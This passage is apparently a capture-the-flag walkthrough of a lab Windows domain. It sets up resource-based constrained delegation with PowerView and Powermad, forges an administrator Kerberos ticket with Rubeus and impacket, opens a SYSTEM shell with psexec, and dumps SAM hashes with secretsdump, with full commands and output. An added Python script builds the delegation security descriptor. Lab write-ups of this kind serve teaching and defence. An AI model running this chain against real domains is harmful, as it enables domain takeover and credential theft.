LDAPS is not usable from outside: the TLS handshake is reset (port 636 showed as tcpwrapped in the scan, consistent with the DC having no server certificate, which is also why Shadow Credentials was ruled out). impacket-addcomputer also has -method SAMR, which creates the account over SMB without LDAPS, and impacket-rbcd can then write the delegation attribute from Linux; the rest of this walkthrough does it from inside the WinRM session instead.

Do the RBCD from the evil-winrm session with Rubeus.
Two PowerShell scripts (Powermad and PowerView) are uploaded as well, to check that the preconditions hold:

*Evil-WinRM* PS C:\Users\support\Documents> ls


    Directory: C:\Users\support\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/30/2025   8:54 AM         135576 Powermad.ps1
-a----         5/30/2025   8:55 AM         770279 PowerView.ps1
-a----         5/30/2025   8:56 AM         446976 Rubeus.exe

# Dot-source the scripts to import them (note the space after the first dot)
*Evil-WinRM* PS C:\Users\support\Documents> . .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1

# Check whether the current user may add machine accounts to the domain
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

ms-ds-machineaccountquota
-------------------------
                       10  # the default: any domain user may add up to 10 machine accounts

# Check the DC version (RBCD needs a Windows Server 2012 or later DC)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainController | select name,osversion | fl


Name      : dc.support.htb
OSVersion : Windows Server 2022 Standard

# Check that msds-allowedtoactonbehalfofotheridentity on DC is empty (nothing there to preserve before it is overwritten)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl


name                                     : DC
msds-allowedtoactonbehalfofotheridentity :

# Create a new "fake" machine account
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FakeComputer -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FakeComputer added

# Get the fake machine account's SID and keep it in a variable for later
*Evil-WinRM* PS C:\Users\support\Documents> $fakesid=Get-DomainComputer FakeComputer | select -expand objectsid
*Evil-WinRM* PS C:\Users\support\Documents> $fakesid
S-1-5-21-1677581083-3380853377-188903654-5601

# Write a security descriptor granting that SID into the DC's msds-allowedtoactonbehalfofotheridentity, so the DC accepts the fake machine account delegating users to it. The attribute lives on the object being delegated to (DC), not on FakeComputer
*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
*Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Read the attribute back from DC and decode the DACL to verify
*Evil-WinRM* PS C:\Users\support\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor.DiscretionaryAcl


BinaryLength       : 36
AceQualifier       : AccessAllowed # the ACE is in place
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5601
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None
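
Added example, not from the page: the security descriptor those PowerView commands write into msDS-AllowedToActOnBehalfOfOtherIdentity, built and parsed by hand so the bytes can be checked offline. The layout follows MS-DTYP (self-relative SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE); the SID is the FakeComputer$ one from the page and the rights string is the SDDL run used above. The parsed ACE should show the same AccessMask (983551) and size (36) as the $Descriptor.DiscretionaryAcl output.

```python
"""Added example, not from the page: the security descriptor that the PowerView
commands above write into msDS-AllowedToActOnBehalfOfOtherIdentity, built and
parsed by hand (MS-DTYP layouts). The SID is the FakeComputer$ one from the page."""
import struct

# rights named in O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SID), MS-DTYP 2.5.1.2
SDDL_RIGHTS = {
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100, "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000,
    "WO": 0x00080000,
}
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"  # the "BA" in O:BA
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 0x02                       # no object-specific ACEs, so plain ACL revision
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000


def access_mask(rights: str) -> int:
    """Sum the two-letter SDDL rights into the numeric ACE mask."""
    return sum(SDDL_RIGHTS[rights[i:i + 2]] for i in range(0, len(rights), 2))


def sid_to_bytes(sid: str) -> bytes:
    """S-1-5-... -> revision, count, 48-bit big-endian authority, LE sub-authorities."""
    _, revision, authority, *subs = sid.split("-")
    subs = [int(s) for s in subs]
    return (bytes([int(revision), len(subs)]) + int(authority).to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def sid_from_bytes(blob: bytes) -> str:
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, 8)
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def build_rbcd_sd(delegate_from_sid: str, rights: str = "CCDCLCSWRPWPDTLOCRSDRCWDWO") -> bytes:
    """Self-relative SD: owner BA, no group, no SACL, and a DACL holding one
    ACCESS_ALLOWED_ACE for the account allowed to delegate to this object."""
    sid = sid_to_bytes(delegate_from_sid)
    # ACE: type, flags, size, mask, SID  (8 + 28 = 36 bytes for a 5-subauthority SID)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), access_mask(rights)) + sid
    # ACL: revision, sbz1, size, ace count, sbz2
    acl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(ace), 1, 0) + ace
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    owner_off = 20                        # the SD header is 20 bytes
    dacl_off = owner_off + len(owner)
    # header: revision, sbz1, control, offsets of owner, group, SACL, DACL
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, 0, 0, dacl_off)
    return header + owner + acl


def parse_rbcd_sd(blob: bytes) -> dict:
    """Read an SD back: owner SID plus one dict per ACE in the DACL."""
    _, _, control, owner_off, _, _, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    owner = sid_from_bytes(blob[owner_off:]) if owner_off else None
    if not control & SE_DACL_PRESENT:
        return {"owner": owner, "aces": []}
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
    aces, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size, mask = struct.unpack_from("<BBHI", blob, off)
        aces.append({"type": ace_type, "flags": ace_flags, "size": ace_size,
                     "mask": mask, "sid": sid_from_bytes(blob[off + 8:off + ace_size])})
        off += ace_size
    return {"owner": owner, "aces": aces}


if __name__ == "__main__":
    sd = build_rbcd_sd("S-1-5-21-1677581083-3380853377-188903654-5601")
    print(len(sd), "bytes:", sd.hex())
    print(parse_rbcd_sd(sd))
```

impacket-rbcd does the same from Linux (`-delegate-from 'FakeComputer$' -delegate-to 'DC$' -action write`) and appends to an existing descriptor rather than replacing it; the overwrite done above is only safe because the attribute was confirmed empty first. On an engagement, keep the original bytes so the attribute can be restored afterwards.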


Collect with BloodHound again to see the new state:
(screenshot: BloodHound after the change)
The RBCD relationship is now in place.
Next, use Rubeus to derive the fake computer account's Kerberos keys from its password:

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:Fakecomputer$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
[*] Input username             : Fakecomputer
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBFakecomputer
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : BC7A02EF683D3145CF69173D862938C0
[*]       aes256_cts_hmac_sha1 : 4E93FD9F6AFAECB92D38E4B4CD89BB25A211630E92731402C1C935754F0FF4EB
[*]       des_cbc_md5          : B564A22CD9578058

Then use Rubeus with the rc4_hmac key to run S4U2self and S4U2proxy and obtain a CIFS service ticket for dc.support.htb as administrator:

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:Fakecomputer$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt /nowrap /outfile:ticket.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\Fakecomputer$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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


[*] Action: S4U

[*] Building S4U2self request for: 'Fakecomputer$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'Fakecomputer$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

      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


[*] Ticket written to ticket_administrator_to_Fakecomputer$@SUPPORT.HTB.kirbi

[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      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

[*] Ticket written to ticket_cifs_dc.support.htb.kirbi

[+] Ticket successfully imported!

*Evil-WinRM* PS C:\Users\support\Documents> ls


    Directory: C:\Users\support\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/30/2025  10:04 AM        1355264 mimikatz.exe
-a----         5/30/2025   8:54 AM         135576 Powermad.ps1
-a----         5/30/2025   8:55 AM         770279 PowerView.ps1
-a----         5/30/2025   8:56 AM         446976 Rubeus.exe
-a----         5/30/2025  10:13 AM           1458 ticket_administrator_to_Fakecomputer$@SUPPORT.HTB.kirbi
-a----         5/30/2025  10:13 AM           1652 ticket_cifs_dc.support.htb.kirbi

Now list the tickets in memory:

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe klist

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x6e7caa

  UserName                 : support
  Domain                   : SUPPORT
  LogonId                  : 0x6e7caa
  UserSID                  : S-1-5-21-1677581083-3380853377-188903654-1105
  AuthenticationPackage    : NTLM
  LogonType                : Network
  LogonTime                : 5/30/2025 8:53:59 AM
  LogonServer              : DC
  LogonServerDNSDomain     : support.htb
  UserPrincipalName        : support@support.htb

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 5/30/2025 9:47:42 AM ; 5/30/2025 7:47:42 PM ; 6/6/2025 9:47:42 AM
      Server Name       : cifs/dc.support.htb @ SUPPORT.HTB
      Client Name       : administrator @ SUPPORT.HTB # the administrator ticket is now in this logon session
      Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

Even with the administrator ticket imported via /ptt, this WinRM session still could not reach the C$ share or start a shell with psexec (the imported ticket sits in support's Network-type logon session, as the klist output shows). Rather than chase that from inside the session, take the ticket to the attacking host.

Copy the base64 ticket (the last one Rubeus printed, the S4U2proxy ticket for cifs/dc.support.htb) and convert it from .kirbi to the .ccache format impacket uses:

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# echo 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 > ticket.kirbi.b64

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# cat ticket.kirbi.b64 |tr -d ' ' |tr -d '\n' |base64 -d >ticket.kirbi

Convert to ccache, point KRB5CCNAME at it, and sync the clock to the DC before using the ticket: the 1276 s step ntpdate applies is the 21m16s skew nmap reported, and outside a 5-minute window the KDC and the target service reject the ticket with KRB_AP_ERR_SKEW.

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# export KRB5CCNAME=ticket.ccache
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# ntpdate 10.10.11.174                                                 
2025-05-30 13:24:12.470470 (-0400) -1276.481508 +/- 0.041695 10.10.11.174 s1 no-leap
CLOCK: time stepped by -1276.481508
                                                                                                                                                            
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file dMMwHPgE.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service NSNW on dc.support.htb.....
[*] Starting service NSNW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

c:\Users\Administrator\Desktop> type root.txt
ad596a7d1e8efbfaefb0dea169c2f4e0

Alternatively, request the service ticket from the attacking host with impacket's getST, using the fake computer account's password directly, and then use psexec, wmiexec or smbexec with it:

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-getST -spn 'cifs/DC.support.htb' -impersonate Administrator -dc-ip 10.10.11.174  'support.htb/FakeComputer$:Password123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache

DCSync

With the administrator CIFS ticket, secretsdump can be pointed at the DC. Sync the clock again first:

┌──(root㉿kali)-[~/Desktop/htb/support]
└─# ntpdate 10.10.11.174                                                      
2025-05-30 13:33:32.258912 (-0400) -1276.483744 +/- 0.040620 10.10.11.174 s1 no-leap
CLOCK: time stepped by -1276.483744
                                                                                                                                                            
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-secretsdump support.htb/administrator@dc.support.htb -k  -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf678b2597ade18d88784ee424ddc0d1a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[-] LSA hashes extraction failed: The NETBIOS connection with the remote host timed out. # timed out; the connection was too slow

(screenshot)